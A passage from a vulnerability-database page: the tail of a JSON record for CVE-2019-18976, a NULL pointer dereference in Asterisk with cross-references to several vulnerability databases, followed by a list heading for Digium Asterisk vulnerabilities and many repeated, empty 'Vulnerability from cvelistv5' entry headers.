        "db": "CNVD",
        "id": "CNVD-2020-01312"
      },
      {
        "date": "2019-12-12T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-012748"
      },
      {
        "date": "2022-04-06T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-1292"
      },
      {
        "date": "2024-11-21T04:33:55.320000",
        "db": "NVD",
        "id": "CVE-2019-18976"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1292"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Sangoma Asterisk and  Certified Asterisk In  NULL Pointer dereference vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012748"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "code problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1292"
      }
    ],
    "trust": 0.6
  }
}

Vulnerabilites related to digium - asterisk

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5

Vulnerability from cvelistv5